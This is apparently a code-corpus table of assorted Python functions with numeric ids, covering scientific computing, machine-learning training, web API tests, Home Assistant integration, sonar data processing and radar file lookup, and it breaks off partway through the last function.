| content | id |
|---|---|
def detect_or_create_config(config_file, output_root, theseargs,
newname=None, logger=None):
""" return path to config file, or die trying.
if a config file exists, just return the path. If not,
create it using "make_riboSeed_config.py"
"""
assert logger is not None, "must use logging"
if not os.path.isfile(config_file):
logger.debug("creating config file")
make_config_args = Namespace(
outdir=output_root,
name=newname)
config_file = mrc.main(make_config_args)
add_these_params_to_config(config_file=config_file,
args=theseargs)
else:
logger.info("using provided config file! ignoring any other args" +
"provided via commandline")
return config_file | 5,334,200 |
def convert_to_file(genotype_input, output_file):
"""Convert a Family Tree DNA file and output GFF-formatted data to file"""
output = output_file # default assumes writable file object
if isinstance(output_file, str):
output = autozip.file_open(output_file, 'w')
conversion = convert(genotype_input)
for line in conversion:
output.write(line + "\n")
output.close() | 5,334,201 |
def gaussian(x, p):
"""
Gaussian function
@param x : variable
    @param p : parameters [amplitude, center, sigma]; the normalization
               factor means p[0] sets the area under the curve
"""
    return p[0] * (1/np.sqrt(2*np.pi*(p[2]**2))) * np.exp(-(x-p[1])**2/(2*p[2]**2)) | 5,334,202 |
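# A minimal usage sketch for the gaussian above (hypothetical values, assumes
# numpy and gaussian are in scope): because of the 1/sqrt(2*pi*sigma^2)
# prefactor, p[0] scales the area under the curve, so the peak height is
# p[0]/sqrt(2*pi*sigma^2) rather than p[0] itself.
import numpy as np

x = np.linspace(-5, 5, 1001)
p = [1.0, 0.0, 1.0]  # amplitude (area), center, sigma
y = gaussian(x, p)
print(y.sum() * (x[1] - x[0]))  # ~1.0, the area p[0]
print(y.max())                  # ~0.3989 = 1/sqrt(2*pi)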
def get_exploration_ids_subscribed_to(user_id):
"""Returns a list with ids of all explorations that the given user
subscribes to.
WARNING: Callers of this function should ensure that the user_id is valid.
Args:
user_id: str. The user ID of the subscriber.
Returns:
list(str). IDs of all explorations that the given user
subscribes to.
"""
subscriptions_model = user_models.UserSubscriptionsModel.get(
user_id, strict=False)
return (
subscriptions_model.exploration_ids
if subscriptions_model else []) | 5,334,203 |
def JC_LAIeffective(self, k):
"""
REQUIRED INPUT:
- LAI (-)
PARAMETERS:
- none (Allen et al., 2006 & Zhou et al., 2006)
"""
self.JC_laiEff = self.LAI / (0.2 * self.LAI + 1) | 5,334,204 |
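# A worked example of the effective-LAI formula above, LAI_eff = LAI / (0.2*LAI + 1)
# (Allen et al., 2006): for LAI = 3 this gives 3 / (0.6 + 1) = 1.875, and the
# ratio LAI_eff/LAI shrinks as the canopy gets denser.
for lai in [0.5, 1.0, 3.0, 6.0]:
    lai_eff = lai / (0.2 * lai + 1)
    print(lai, round(lai_eff, 3))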
def generate_trials(olh_samples: np.ndarray, roi_space: Space) -> list[dict]:
"""
Generates trials from the given normalized orthogonal Latin hypercube samples
Parameters
----------
    olh_samples: `numpy.ndarray`
Samples from the orthogonal Latin hypercube
roi_space: orion.algo.space.Space
Parameter space region-of-interest
Returns
-------
    A list of trials as `dict` objects, each mapping parameter names to values
    in the original search space
"""
trials = []
for sample in olh_samples:
trial_dict = {}
for j, param_name in enumerate(roi_space.keys()):
interval_min, interval_max = roi_space[param_name].interval()
# TODO: deal with categoricals
trial_dict[param_name] = (
sample[j] * (interval_max - interval_min) + interval_min
)
trials.append(trial_dict)
return trials | 5,334,205 |
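# A self-contained sketch of the rescaling generate_trials performs, without the
# orion Space dependency: each normalized sample in [0, 1] is mapped affinely
# onto its parameter's interval. The parameter names and intervals here are
# hypothetical.
import numpy as np

olh_samples = np.array([[0.0, 0.5], [1.0, 0.25]])
intervals = {"lr": (1e-4, 1e-1), "momentum": (0.0, 0.99)}
trials = []
for sample in olh_samples:
    trials.append({
        name: s * (hi - lo) + lo
        for s, (name, (lo, hi)) in zip(sample, intervals.items())
    })
print(trials)  # [{'lr': 0.0001, 'momentum': 0.495}, {'lr': 0.1, 'momentum': 0.2475}]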
def check_all_flash(matrix_2d):
"""
Check if all octopuses flashed.
:param matrix_2d: 2D matrix
:return: Boolean
"""
for line in matrix_2d:
for digit in line:
            if digit != 0:
                return False
    return True | 5,334,206 |
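# Quick sanity check of check_all_flash: all octopuses have flashed exactly when
# every energy level in the grid is zero.
print(check_all_flash([[0, 0], [0, 0]]))  # True
print(check_all_flash([[0, 1], [0, 0]]))  # False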
def validate_content_length_header_not_too_large(
request_headers: Dict[str, str],
request_body: bytes,
) -> None:
"""
Validate the ``Content-Length`` header is not too large.
Args:
request_headers: The headers sent with the request.
request_body: The body of the request.
Raises:
ContentLengthHeaderTooLarge: The given content length header says that
the content length is greater than the body length.
"""
given_content_length = request_headers['Content-Length']
body_length = len(request_body if request_body else b'')
given_content_length_value = int(given_content_length)
if given_content_length_value > body_length:
raise ContentLengthHeaderTooLarge | 5,334,207 |
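# A minimal usage sketch for the validator above, assuming the
# ContentLengthHeaderTooLarge exception from the surrounding module is in scope:
# a Content-Length that matches (or undershoots) the body passes, while an
# inflated one raises.
body = b'{"key": "value"}'
validate_content_length_header_not_too_large(
    request_headers={'Content-Length': str(len(body))},
    request_body=body,
)  # no exception
try:
    validate_content_length_header_not_too_large(
        request_headers={'Content-Length': str(len(body) + 10)},
        request_body=body,
    )
except ContentLengthHeaderTooLarge:
    print("rejected oversized Content-Length header")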
def train(request, pretrained):
"""
Train a model, and save it to disk.
"""
if pretrained:
return dash.no_update
dataset = get_dataset(request["dataset_name"])
train_set = dataset["train_set"]
val_set = dataset["val_set"]
lake_set = dataset["lake_set"]
n_classes = dataset["n_classes"]
# TODO: allow multiple examples in query set?
# TODO: allow query examples that aren't in train set (from lake, or uploaded)
trainloader = DataLoader(train_set, batch_size=TRAIN_BATCH_SIZE, shuffle=True, pin_memory=True)
valloader = DataLoader(val_set, batch_size=VAL_BATCH_SIZE, shuffle=False, pin_memory=True)
print(f"Number of labeled examples: {len(train_set)}. Number of unlabeled examples: {len(lake_set)}")
result_dict = {}
model = get_model(request["model_name"], n_classes, DEVICE, EMBEDDING_TYPE)
optimizer = get_optimizer(model)
criterion = nn.CrossEntropyLoss()
# Get the initial model by training
# In the future, we may choose to save the initial model to disk.
print("Beginning training")
for i_epoch in range(EPOCHS_PER_ROUND):
model.train()
for inputs, targets in trainloader:
inputs, targets = inputs.to(DEVICE), targets.to(DEVICE, non_blocking=True)
optimizer.zero_grad()
outputs = model(inputs)
loss = criterion(outputs, targets)
loss.backward()
optimizer.step()
# TODO: Add some kind of progress bar or accuracy display for responsiveness
# TODO: Report initial train/val accuracy for plotting
print("Training done")
# Save trained model to disk
model_path = os.path.join("models/", request["dataset_name"], request["model_name"])
os.makedirs(model_path, exist_ok=True)
model_path = os.path.join(model_path, "saved.pth")
torch.save(model, model_path)
# Compute values for logging (train/val accuracy)
with torch.no_grad():
model.eval()
for loader, name in [(trainloader, "train"), (valloader, "val")]:
examples_total = 0
examples_correct = 0
for inputs, targets in loader:
inputs, targets = inputs.to(DEVICE), targets.to(DEVICE, non_blocking=True)
outputs = model(inputs)
_, predicted = outputs.max(1)
examples_total += targets.size(0)
examples_correct += predicted.eq(targets).sum().item()
result_dict[name + "_accuracy"] = examples_correct/examples_total
return dash.no_update | 5,334,208 |
def test_create_programs_without_revise(data_dir: str):
"""Tests creating programs without revise calls.
It should not use refer calls even with a valid salience model.
"""
utterance_tokenizer = UtteranceTokenizer()
salience_model = VanillaSalienceModel()
for trade_dialogue in load_test_trade_dialogues(data_dir):
for avoid_empty_plan in [True, False]:
_, num_refer_calls, _ = create_programs_for_trade_dialogue(
trade_dialogue=trade_dialogue,
keep_all_domains=True,
remove_none=False,
fill_none=False,
salience_model=salience_model,
no_revise=True,
avoid_empty_plan=avoid_empty_plan,
utterance_tokenizer=utterance_tokenizer,
)
assert num_refer_calls == 0 | 5,334,209 |
async def async_setup_entry(hass, config_entry, async_add_devices):
"""Add sensors for passed config_entry in HA."""
wind = hass.data[DOMAIN][config_entry.entry_id]
new_devices = []
for windturbine in wind.windturbines:
new_devices.append(PulsingSensor(windturbine))
if new_devices:
async_add_devices(new_devices) | 5,334,210 |
def cache_get(cache, key, fcn, force=False):
"""Get key from cache, or compute one."""
if cache is None:
cache = {}
if force or (key not in cache):
cache[key] = fcn()
return cache[key] | 5,334,211 |
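# A usage sketch for cache_get: the fcn thunk runs only on a miss (or when
# force=True), so repeated lookups with the same key reuse the cached value.
calls = []
def expensive():
    calls.append(1)
    return 42

cache = {}
print(cache_get(cache, "answer", expensive))  # 42, computed
print(cache_get(cache, "answer", expensive))  # 42, cached
print(len(calls))                             # 1
print(cache_get(cache, "answer", expensive, force=True))  # 42, recomputed
print(len(calls))                             # 2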
def savefig(path):
"""matplotlib.savefig"""
plt.savefig(path) | 5,334,212 |
def _BreadthFirstSearch(to_visit, children, visited_key=lambda x: x):
"""Runs breadth first search starting from the nodes in |to_visit|
Args:
to_visit: the starting nodes
children: a function which takes a node and returns the nodes adjacent to it
visited_key: a function for deduplicating node visits. Defaults to the
identity function (lambda x: x)
Returns:
A list of nodes which are reachable from any node in |to_visit| by calling
|children| any number of times.
"""
to_visit = list(to_visit)
seen = set(map(visited_key, to_visit))
for node in to_visit:
for child in children(node):
key = visited_key(child)
if key not in seen:
seen.add(key)
to_visit.append(child)
return to_visit | 5,334,213 |
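# A small usage sketch for _BreadthFirstSearch with an adjacency dict: the
# returned list contains every node reachable from the start set, in BFS order,
# with visited_key deduplicating revisits.
graph = {"a": ["b", "c"], "b": ["d"], "c": ["d"], "d": []}
reachable = _BreadthFirstSearch(["a"], children=lambda n: graph[n])
print(reachable)  # ['a', 'b', 'c', 'd']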
def readfq(fp): # this is a generator function
"""
FASTA/Q parser from Heng Li:
https://github.com/lh3/readfq/blob/master/readfq.py
"""
last = None # this is a buffer keeping the last unprocessed line
while True: # mimic closure; is it a bad idea?
if not last: # the first record or a record following a fastq
for l in fp: # search for the start of the next record
if l[0] in '>@': # fasta/q header line
last = l[:-1] # save this line
break
if not last: break
name, seqs, last = last[1:].partition(" ")[0], [], None
for l in fp: # read the sequence
if l[0] in '@+>':
last = l[:-1]
break
seqs.append(l[:-1])
if not last or last[0] != '+': # this is a fasta record
yield name, ''.join(seqs), None # yield a fasta record
if not last: break
else: # this is a fastq record
seq, leng, seqs = ''.join(seqs), 0, []
for l in fp: # read the quality
seqs.append(l[:-1])
leng += len(l) - 1
if leng >= len(seq): # have read enough quality
last = None
                    yield name, seq, ''.join(seqs)  # yield a fastq record
break
if last: # reach EOF before reading enough quality
yield name, seq, None # yield a fasta record instead
break | 5,334,214 |
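# A usage sketch for readfq on an in-memory file: the third element of each
# yielded tuple is the quality string for FASTQ records and None for FASTA
# records.
import io

fasta = io.StringIO(">seq1 description\nACGT\nACGT\n>seq2\nTTTT\n")
for name, seq, qual in readfq(fasta):
    print(name, seq, qual)
# seq1 ACGTACGT None
# seq2 TTTT None

fastq = io.StringIO("@read1\nACGT\n+\nIIII\n")
for name, seq, qual in readfq(fastq):
    print(name, seq, qual)
# read1 ACGT IIII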
def get_receptor_from_receptor_ligand_model(receptor_ligand_model):
"""
    This function obtains the name of the receptor based on receptor_ligand_model
Example of input: compl_ns3pro_dm_0_-_NuBBE_485_obabel_3D+----+20
"""
    separator_receptor = "_-_"
    string_ref = receptor_ligand_model
    receptor_name = string_ref.split(separator_receptor)[0]  # keep only the receptor name
return receptor_name | 5,334,215 |
def build_model():
"""
Selects the best model with optimal parameters
"""
pipeline = Pipeline([
('vect', CountVectorizer(tokenizer=tokenize)),
('svd', TruncatedSVD()),
('tfidf', TfidfTransformer()),
('clf', MultiOutputClassifier(RandomForestClassifier(class_weight='balanced')))
])
parameters = {'clf__estimator__n_estimators': [25, 50],
'clf__estimator__max_depth': [10, 25]}
cv_rf = GridSearchCV(pipeline, parameters)
return cv_rf | 5,334,216 |
def monthly_expenses(costs, saleprice, propvalue, boyprincipal, rent):
"""Calculate monthly expenses
costs list of MonthlyCost objects
saleprice sale price of the property
propvalue actual value of the property
boyprincipal principal at beginning of year to calculate for
rent projected monthly rent for the property
"""
expenses = []
if not costs:
return expenses
# deepcopy the costs during *every* iteration,
# or else we keep doing expenses.append(cost) on the same cost each time
for cost in copy.deepcopy(costs):
# First, check our inputs
if cost.calctype == costconfig.CostCalculationType.DOLLAR_AMOUNT and cost.value is None:
raise Exception(
f"The {cost.label} MonthlyCost calctype is DOLLAR_AMOUNT, "
"but with an empty value property")
elif (
cost.calctype is not costconfig.CostCalculationType.DOLLAR_AMOUNT and
cost.calc is None):
raise Exception(
f"The {cost.label} MonthlyCost calctype is {cost.calctype}, "
"but with an empty calc property")
# Now calculate what can be calculated now
# Don't calculate LOAN_FRACTION or INTEREST_MONTHS calctypes here,
# because any PRINCIPAL paytypes will affect their value
if cost.calctype is costconfig.CostCalculationType.DOLLAR_AMOUNT:
pass
elif cost.calctype is costconfig.CostCalculationType.YEARLY_PRINCIPAL_FRACTION:
cost.value = boyprincipal * cost.calc / mmath.MONTHS_IN_YEAR
elif cost.calctype is costconfig.CostCalculationType.SALE_FRACTION:
cost.value = saleprice * cost.calc
elif cost.calctype is costconfig.CostCalculationType.VALUE_FRACTION:
cost.value = propvalue * cost.calc
elif cost.calctype is costconfig.CostCalculationType.MONTHLY_RENT_FRACTION:
cost.value = rent * cost.calc
elif cost.calctype is costconfig.CostCalculationType.CAPEX:
cost.value = cost.calc.monthly
else:
raise NotImplementedError(
f"Cannot process a cost with a calctype of {cost.calctype}")
# logger.info(f"Calculating monthy expense: {cost}")
expenses.append(cost)
return expenses | 5,334,217 |
def test_reg_user_cannot_view_user_dne(reg_user_headers):
""" regular user cannot view user that doesn't exist """
org = reg_user_headers['CVE-API-ORG']
user = str(uuid.uuid4())
res = requests.get(
f'{env.AWG_BASE_URL}{ORG_URL}/{org}/user/{user}',
headers=reg_user_headers
)
assert res.status_code == 404
response_contains_json(res, 'error', 'USER_DNE') | 5,334,218 |
def get_spitfire_template_class(prefer_c_extension=True):
"""Returns an appropriate SpitfireTemplate class.
Args:
prefer_c_extension: If set True and _template loaded properly, use the
C extension's baseclass implementation.
Returns:
A SpitfireTemplate class with an appropriate base class.
"""
if prefer_c_extension and _template is not None:
baseclass = _template.BaseSpitfireTemplate
else:
baseclass = _BaseSpitfireTemplate
class _SpitfireTemplate(baseclass):
# store a reference to the filter function - this is tricky because of
# some python stuff. filter functions look like this:
#
# def filter_function(template_instance, value):
#
# when this is assigned to a template instance, accessing this name
# binds the function to the current instance. using the name
# 'template_instance' to indicate that these functions aren't really
# related to the template.
_filter_function = staticmethod(filters.simple_str_filter)
repeat = None
placeholder_cache = None
def __init__(self,
search_list=None,
default_filter=None,
use_placeholder_cache=False):
# use_placeholder_cache - cache the values returned from the
# search_list? The cached values will live for the lifetime of
# this object.
self.search_list = search_list
if use_placeholder_cache:
self.placeholder_cache = {}
if default_filter is not None:
self._filter_function = default_filter
# FIXME: repeater support is not needed most of the time, just
# disable it for the time being
# self.repeat = spitfire.runtime.repeater.RepeatTracker()
def get_var(self, name, default=None):
return udn.resolve_from_search_list(self.search_list, name, default)
def has_var(self, name):
var = self.get_var(name, default=runtime.UnresolvedPlaceholder)
return var is not runtime.UnresolvedPlaceholder
@staticmethod
def new_buffer():
return BufferIO()
return _SpitfireTemplate | 5,334,219 |
def _create_player_points(
pool: pd.DataFrame,
teams: np.ndarray,
n_iterations: int,
n_teams: int,
n_players: int,
team_points: np.ndarray
) -> np.ndarray:
"""Calculates playerpoints
Args:
pool (pd.DataFrame): the player pool
statscols (Iterable[str]): the statistics columns
teams (np.ndarray): the teams
Returns:
np.ndarray
"""
# now need to link back to players
players = pool.index.values
# once we've calculated stats, can remove league dimension from teams
# is just a 2D array of teams
# if you flatten teampoints, get 1D array lines up with 2D teams
teams2d = teams.reshape(n_iterations * n_teams, n_players)
team_points1d = team_points.ravel()
# creates array of shape (len(teams2d), len(players))
# is effectively one hot encoder for player indexes
# if player index 3 is on team 0, then on_team[0, 3] == 1
on_team = (players[...,None]==teams2d[:,None,:]).any(-1).astype(int)
# now we can calculate player points by multiplying
# matrix of zeroes and ones with team points
return on_team * team_points1d[:, np.newaxis] | 5,334,220 |
def generate_system_exe_funcs():
""" Generates the functions needed to process the `System`s. """
max_parameters = 30
path = "./systems/system_exe_funcs.gen.h"
internal_generate_system_exe_funcs(False, max_parameters, path) | 5,334,221 |
def get_SolverSettings(instance):
""" get solver settings """
instance.sSolver = ""
instance.dicPyomoOption = {}
instance.dicSolverOption = {}
file_setting = "../Input/1_model_config/01_SolverConfig.csv"
dt_data = genfromtxt(file_setting, dtype = str, skip_header=0, delimiter=',')
for sSetting in dt_data:
if sSetting[0] == "Solver":
instance.sSolver = sSetting[2]
elif sSetting[0] == "Pyomo options" and sSetting[3] == "1":
instance.dicPyomoOption[sSetting[1]] = sSetting[2]
elif sSetting[0] == "Solver options" and sSetting[3] == "1":
instance.dicSolverOption[sSetting[1]] = sSetting[2]
return instance | 5,334,222 |
def on_reported(client, userdata, message):
"""
*Callback function parses a FireReported message, switches FireState from "detected" to "reported", and records time of first report, name of satellite reporting the fire, and groundId receiving the report*
.. literalinclude:: /../examples/firesat/fires/main_fire.py
:lines: 84-92
"""
for index, observer in enumerate(app.simulator._observers):
if isinstance(observer, Environment):
app.simulator._observers[index].on_reported(client, userdata, message) | 5,334,223 |
def demod_from_array(mod_array, faraday_sampling_rate = 5e6, start_time = 0, end_time = 'max', reference_frequency = 736089.8, reference_phase_deg = 0, lowpas_freq = 10000, plot_demod = False, decimate_factor = 4, time_stamp = '', label = '', save = False):
"""
Sweet lord above this function washes the dishes as well. In summary it opens a h5
file, in the same directory as the file, extracts data according to specified
directory and then demodulates. Demodulation requires phase and frequency to be
entered. After this is decimates the data, done to upload into limited memory of
and arbitary waveform generator. Along the way there are options to plot graphs
in order to check outputs. It returns the decimated waveform in a numpy array.
Arguments;
h5file_name - Name of the h5 file data is being loaded from
h5data_path - Path in the h5 file to the data
faraday_sampling_rate - Sampling rate the data was recorded at
start_time - Selecting the start time of the data in the h5 file after which data will
be data
end_time - Selecting the end time of the data before which data will be included. Enter 'max' for
the entire array
reference_frequency - Frequency of the reference waveform used for demodulation
reference_phase_deg - Phase of the reference waveform used for demodulation.
lowpas_freq - frequency of the lowpass filter. May be the 6db point, don't know.
plot_demod - Plots a figure of the demodulated data
decimate_factor - Multiple for decimating the data.
"""
""" Creating the reference """
Faraday_clipped = mod_array
dt = 1/faraday_sampling_rate
time_axis = np.arange(len(Faraday_clipped))*dt
# Decimate input data to help filter behave better
# Faraday_clipped = signal.decimate(Faraday_clipped, 100, n=None, ftype='iir', axis=-1, zero_phase=True)
# time_axis = signal.decimate(time_axis, 100, n=None, ftype='iir', axis=-1, zero_phase=True)
# dt = 1/faraday_sampling_rate
reference = np.sin(2*np.pi*reference_frequency*time_axis + reference_phase_deg*np.pi/180)
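    # NOTE: the next line overrides the decimate_factor argument; the two
    # decimation passes of 10 below give an overall factor of 100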
decimate_factor = 10
""" Multiplying Faraday with reference and lowpassing """
multiplied_waves = np.multiply(Faraday_clipped, reference)
# Decimate input data for LPFilter
    # NOTE: the decimate factor must be under 13, so to get 100 we do 10 twice
dec_data = signal.decimate(multiplied_waves, decimate_factor, n=None, ftype='iir', axis=-1, zero_phase=True)
dec_dec_data = signal.decimate(dec_data, decimate_factor, n=None, ftype='iir', axis=-1, zero_phase=True)
# dec_time = signal.decimate(time_axis, decimate_factor, n=None, ftype='iir', axis=-1, zero_phase=True)
# dec_dec_time = signal.decimate(dec_time, decimate_factor, n=None, ftype='iir', axis=-1, zero_phase=True)
demod_time = np.arange(len(dec_dec_data))*dt*decimate_factor*decimate_factor
# Feed into Low pass filter
demodulated = LPFilter(dec_dec_data, lowpas_freq, dt*decimate_factor*decimate_factor)
""" Figures to check demodulation """
fNameDemod = str(time_stamp) + '_Fx_demodulated'
if plot_demod == True:
plt.figure(4, figsize = (10,7.5))
# plt.plot(time_axis, multiplied_waves, label = label)
plt.plot(demod_time, demodulated, label = label)
plt.xlabel('Time (s)')
plt.ylabel('Demodulated <Fx>')
# plt.xlim(time_axis[0], time_axis[-1])
plt.title(fNameDemod)
plt.grid()
if save is True:
path = 'C:/Users/Boundsy/Desktop/Uni Work/PHS2360/Sim Results/' + str(fNameDemod) + '.png'
print('Demodulated Fx plot saved to Sim Results folder')
plt.savefig(path)
fNamePeriodogram = str(time_stamp) + '_demod_periodogram'
freq, amp = make_periodogram(demodulated, faraday_sampling_rate/100, fNamePeriodogram, saveFig = save, plot_graph = plot_demod, start_freq = 0, end_freq = 20000, label = label)
""" decimating data """
# decimated_demod = signal.decimate(demodulated, 100, n=None, ftype='iir', axis=-1, zero_phase=True)
# return decimated_demod
return demodulated | 5,334,224 |
def listen(path, calfile=None, transitspeed=3,
platform='Unknown', savepng=False, reportrows=10, recipient=None):
"""
Listen for new raw files. When find a new one, it carries out the following
actions:
1) Read RAW data
2) Process RAW data (calibration, de-noising and target identification)
3) Report (summarise and deliver results)
Results are stored in log/.
Args:
path (str) : Path to the directory where the RAW files
are copied by the echosounder.
calfile (str) : Path to the calibration file.
transitspeed (int, float): Minimum speed to consider the platform in
transit and proceed to process data (knots).
platform (str) : Platform name.
        savepng (bool)           : Whether or not you want to save PNG images
                                   showing processed echograms.
reportrows (int) : number of rows in table reports.
recipient (str) : recipient email to receive results.
"""
# Check if recipient email has been provided
if recipient is None:
raise Exception('Need to provide a recipient email address')
# Report path being listened
logger.info('Listening at %s...', path)
    # List preceding RAW files in the directory
    r = re.compile('.*raw$', re.IGNORECASE)
    pre = [f for f in os.listdir(path) if r.match(f)]
pre.sort()
# Preallocate variables and loop forever
logname = datetime.datetime.now().strftime('D%Y%m%d-T%H%M%S')
preraw = None
rawpile = None
alr = []
t = '\n\t\t\t\t\t > '
lastrow = 0
while 1:
        # List cumulated RAW files in the directory (preceding + newcomers)
        time.sleep(10)
        cum = [f for f in os.listdir(path) if r.match(f)]
cum.sort()
# Report of "No new files", if cumulated and preeceding are equal
if len(cum)==len(pre):
logger.info('No new files')
        # Reset list of preceding files, if files have been deleted
if len(cum)<len(pre):
logger.warning('Files have been deleted!')
pre = cum.copy()
        # Identify new files as the difference between cumulated and preceding
if len(cum)>len(pre):
new = cum.copy()
for filename in pre:
new.remove(filename)
# Identify repeated files (already processed but incoming again)
rep = list(set(new) & set(alr))
if len(rep)>0:
rep.sort()
                    rep.insert(0, 'Incoming files already processed:')
                    logger.warning(t.join(rep))
                    rep.remove('Incoming files already processed:')
for filename in rep:
new.remove(filename)
pre.append(filename)
pre=list(set(pre))
# Report list of new files pending to be processed
if len(new)>0:
new.insert(0, 'Files pending:')
if len(new)>3:
logger.info(t.join(new[:3]+['+ '+str(len(new)-3)+' more']))
else:
logger.info(t.join(new))
new.remove('Files pending:')
# If more than one new file, try to process the first one
if (len(new))>1:
try:
                    # Move file name to preceding & already-processed lists
pre.append(new[0])
alr.append(new[0])
# Read RAW
rawfile = os.path.join(path, new[0])
raw = read.raw(rawfile, transitspeed=transitspeed,
calfile=calfile, preraw=preraw)
preraw = raw.copy()
                    # If raw data is continuous with preceding data...
if raw['continuous']:
# pile up current raw data in the rawpile
if rawpile is not None:
rawpile = read.join(rawpile, raw)
# or start a new rawpile if not created yet
else:
rawpile = raw.copy()
# Start a new rawpile if raw is not continuous
else:
rawpile = raw.copy()
prepro = None
jdx = [0,0]
                    # Process rawpile if vessel is moving...
if rawpile['transect']>0:
# Process rawpile if it's got at least 1 nmi...
if rawpile['nm'][-1]-rawpile['nm'][0]>1:
pro = process.ccamlr(rawpile,prepro=prepro,jdx=jdx)
# Report results
report.console(pro)
report.log(pro, logname, savepng=savepng)
try:
lastrow = report.land(logname, lastrow,
reportrows,
platform=platform,
recipient=recipient)
except Exception:
logger.error('Failed to send report',exc_info=True)
prepro = rawpile
jdx = process.next_jdx(pro)
rawpile = None
# or report it hasn't got 1 nmi yet
else:
logger.info('Processing pending: at least ' +
'1 nmi required')
# or report the vessel is not moving, and reset parameters
else:
logger.info('Processing skipped: ' +
'platform not in transit')
rawpile = None
prepro = None
jdx = [0,0]
# free up memory RAM
if 'raw' in locals(): del raw
if 'pro' in locals(): del pro
gc.collect()
# log error if process fails and reset rawpile
except Exception:
logger.error('Failed to process file', exc_info=True)
rawpile = None | 5,334,225 |
def test_provider_system_hook_dicts_merge(change_dir, clean_outputs):
"""Verify the hook call works properly."""
output = tackle('.', context_file='merge.yaml', no_input=True)
assert output['merge_map']['stuff'] == 'blah'
assert len(output['merge_map']) == 3 | 5,334,226 |
async def test_dimmable_light(hass):
"""Test dimmable light discovery."""
device = (
'light.test_2', 'on', {
'brightness': 128,
'friendly_name': "Test light 2", 'supported_features': 1
})
appliance = await discovery_test(device, hass)
assert appliance['endpointId'] == 'light#test_2'
assert appliance['displayCategories'][0] == "LIGHT"
assert appliance['friendlyName'] == "Test light 2"
assert_endpoint_capabilities(
appliance,
'Alexa.BrightnessController',
'Alexa.PowerController',
)
properties = await reported_properties(hass, 'light#test_2')
properties.assert_equal('Alexa.PowerController', 'powerState', 'ON')
properties.assert_equal('Alexa.BrightnessController', 'brightness', 50)
call, _ = await assert_request_calls_service(
'Alexa.BrightnessController', 'SetBrightness', 'light#test_2',
'light.turn_on',
hass,
payload={'brightness': '50'})
assert call.data['brightness_pct'] == 50 | 5,334,227 |
def find_many_files_gridrad(
top_directory_name, radar_field_names, radar_heights_m_agl,
start_time_unix_sec, end_time_unix_sec, one_file_per_time_step=True,
raise_error_if_all_missing=True):
"""Finds many files with storm-centered images from GridRad data.
T = number of "file times"
If `one_file_per_time_step = True`, T = number of time steps
Else, T = number of SPC dates
F = number of radar fields
H = number of radar heights
:param top_directory_name: Name of top-level directory for storm-centered
images.
:param radar_field_names: length-F list with names of radar fields.
:param radar_heights_m_agl: length-H numpy array of radar heights (metres
above ground level).
:param start_time_unix_sec: See doc for `find_many_files_myrorss_or_mrms`.
:param end_time_unix_sec: Same.
:param one_file_per_time_step: Same.
:param raise_error_if_all_missing: Same.
:return: file_dict: Dictionary with the following keys.
file_dict['image_file_name_matrix']: T-by-F-by-H numpy array of paths to
image files.
file_dict['valid_times_unix_sec']: length-T numpy array of valid times. If
`one_file_per_time_step = False`, valid_times_unix_sec[i] is just a time
within the [i]th SPC date.
file_dict['radar_field_names']: Same as input.
file_dict['radar_heights_m_agl']: Same as input.
"""
error_checking.assert_is_numpy_array(
numpy.array(radar_field_names), num_dimensions=1
)
for this_field_name in radar_field_names:
radar_utils.check_field_name(this_field_name)
error_checking.assert_is_numpy_array(radar_heights_m_agl, num_dimensions=1)
error_checking.assert_is_geq_numpy_array(radar_heights_m_agl, 0)
radar_heights_m_agl = numpy.round(radar_heights_m_agl).astype(int)
error_checking.assert_is_boolean(one_file_per_time_step)
error_checking.assert_is_boolean(raise_error_if_all_missing)
if one_file_per_time_step:
all_times_unix_sec = time_periods.range_and_interval_to_list(
start_time_unix_sec=start_time_unix_sec,
end_time_unix_sec=end_time_unix_sec,
time_interval_sec=GRIDRAD_TIME_INTERVAL_SEC, include_endpoint=True)
good_indices = numpy.where(numpy.logical_and(
all_times_unix_sec >= start_time_unix_sec,
all_times_unix_sec <= end_time_unix_sec
))[0]
all_times_unix_sec = all_times_unix_sec[good_indices]
all_spc_date_strings = [
time_conversion.time_to_spc_date_string(t)
for t in all_times_unix_sec
]
else:
first_spc_date_string = time_conversion.time_to_spc_date_string(
start_time_unix_sec)
last_spc_date_string = time_conversion.time_to_spc_date_string(
end_time_unix_sec)
all_spc_date_strings = time_conversion.get_spc_dates_in_range(
first_spc_date_string=first_spc_date_string,
last_spc_date_string=last_spc_date_string)
all_times_unix_sec = numpy.array([
time_conversion.spc_date_string_to_unix_sec(s)
for s in all_spc_date_strings
], dtype=int)
file_dict = {
RADAR_FIELD_NAMES_KEY: radar_field_names,
RADAR_HEIGHTS_KEY: radar_heights_m_agl
}
image_file_name_matrix = None
valid_times_unix_sec = None
valid_spc_date_strings = None
num_fields = len(radar_field_names)
num_heights = len(radar_heights_m_agl)
for j in range(num_fields):
for k in range(num_heights):
print((
'Finding storm-image files for "{0:s}" at {1:d} metres AGL...'
).format(
radar_field_names[j], radar_heights_m_agl[k]
))
if j == 0 and k == 0:
image_file_names = []
valid_times_unix_sec = []
valid_spc_date_strings = []
for i in range(len(all_times_unix_sec)):
if one_file_per_time_step:
this_time_unix_sec = all_times_unix_sec[i]
else:
this_time_unix_sec = None
this_file_name = find_storm_image_file(
top_directory_name=top_directory_name,
unix_time_sec=this_time_unix_sec,
spc_date_string=all_spc_date_strings[i],
radar_source=radar_utils.GRIDRAD_SOURCE_ID,
radar_field_name=radar_field_names[j],
radar_height_m_agl=radar_heights_m_agl[k],
raise_error_if_missing=False)
if not os.path.isfile(this_file_name):
continue
image_file_names.append(this_file_name)
valid_times_unix_sec.append(all_times_unix_sec[i])
valid_spc_date_strings.append(all_spc_date_strings[i])
num_times = len(image_file_names)
if num_times == 0:
if raise_error_if_all_missing:
if one_file_per_time_step:
start_time_string = (
time_conversion.unix_sec_to_string(
start_time_unix_sec, TIME_FORMAT)
)
end_time_string = (
time_conversion.unix_sec_to_string(
end_time_unix_sec, TIME_FORMAT)
)
error_string = (
'Cannot find any files from {0:s} to {1:s}.'
).format(start_time_string, end_time_string)
raise ValueError(error_string)
error_string = (
'Cannot find any files from SPC dates "{0:s}" to '
'"{1:s}".'
).format(
all_spc_date_strings[0], all_spc_date_strings[-1]
)
raise ValueError(error_string)
file_dict.update({
IMAGE_FILE_NAMES_KEY: None, VALID_TIMES_KEY: None
})
return file_dict
image_file_name_matrix = numpy.full(
(num_times, num_fields, num_heights), '', dtype=object
)
image_file_name_matrix[:, j, k] = numpy.array(
image_file_names, dtype=object)
valid_times_unix_sec = numpy.array(
valid_times_unix_sec, dtype=int)
else:
for i in range(len(valid_times_unix_sec)):
if one_file_per_time_step:
this_time_unix_sec = valid_times_unix_sec[i]
else:
